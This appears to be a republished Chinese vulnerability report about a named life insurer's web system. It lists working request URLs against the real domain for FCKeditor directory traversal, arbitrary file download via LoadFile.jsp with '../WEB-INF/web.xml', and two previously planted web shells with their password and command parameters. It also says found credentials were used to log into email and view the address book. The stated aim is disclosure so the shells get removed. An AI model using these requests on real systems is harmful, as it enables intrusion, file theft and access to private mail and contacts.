频道栏目
首页 > 资讯 > 企业安全 > 正文

长城人寿某系统漏洞打包(目录遍历/文件下载/前人shell)

16-07-19        来源:[db:作者]  
收藏   我要投稿

目录遍历/文件下载/前人shell,我只是希望能把shell删干净,所以提一下

http://www.4008118228.cn/index.shtml

 

QQ截图20160602204357.png

 

系统使用了fck编辑器

http://www.4008118228.cn/Editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../

 

QQ截图20160602204449.png

 

 

QQ截图20160602204646.png

 

http://www.4008118228.cn/Editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../Include/

 

QQ截图20160603164654.png

 

在遍历目录的时候发现一个文件

http://www.4008118228.cn/common/LoadFile.jsp

 

QQ截图20160603164749.png

 

访问的时候,会把绝对路径爆出来

简单构造就可以下载文件了

http://www.4008118228.cn/common/LoadFile.jsp?FileName=LoadFile.jsp

 

QQ截图20160603164844.png

 

http://www.4008118228.cn/common/LoadFile.jsp?FileName=../WEB-INF/web.xml

 

QQ截图20160603164918.png

 

同样的文件在此处还发现一个

http://www.4008118228.cn/Platform/LoadFile.jsp

 

QQ截图20160603164954.png

 

一并改了吧

shell:

 

QQ截图20160603165026.png

 

http://www.4008118228.cn/shell.jsp?pwd=023&i=ls /

这里还有一枚遗留,点出来一并删了吧

http://www.4008118228.cn/uddiexplorer/2ss.jsp?pwd=023&i=ls

 

QQ截图20160603095639.png

 

使用找到的mail登录邮箱

 

QQ截图20160603100254.png

 

通讯录

 

QQ截图20160603100443.png

 

 

QQ截图20160603100546.png

 

最后登录系统

 

QQ截图20160603100027.png

 

解决方案:

过滤../

相关TAG标签
上一篇:证券时报APP SQL注入影响所有注册用户
下一篇:同程旅游某系统配置不当任意文件上传getshell/root权限
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站